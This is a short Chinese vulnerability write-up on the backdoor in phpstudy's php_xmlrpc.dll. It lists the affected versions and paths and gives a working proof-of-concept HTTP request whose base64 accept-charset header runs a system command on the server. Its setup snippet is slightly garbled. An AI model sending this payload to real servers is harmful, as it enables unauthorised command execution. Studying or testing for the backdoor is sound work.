phpstudy后门利用

0x01 漏洞简介

phpstudy是一个对初学php的人们很有帮助的工具，他集成的环境可以给初学者带来很多便捷之处，但是某些版本存在后门，如果服务器使用存在后门的phpstudy搭建，这样可以直接被人家getshell

0x02 影响版本

• phpstudy 2016版php-5.4
• phpstudy 2018版php-5.2.17
• phpstudy 2018版php-5.4.45

0x03 后门位置

后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016和phpStudy2018自带php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

0x04 环境搭建

使用带后门的phpstudy进行搭建在www目录写一个index.pnp

 
	echo “helloworld!”;
?>

0x05 漏洞复现

访问这个页面进行抓包将修改一下内容

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7      //字段需要进行base64编码
Accept-Encoding: gzip,deflate         //deflate前面的空格去掉

POC

GET / HTTP/1.1
Host: 192.168.4.113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
Content-Length: 2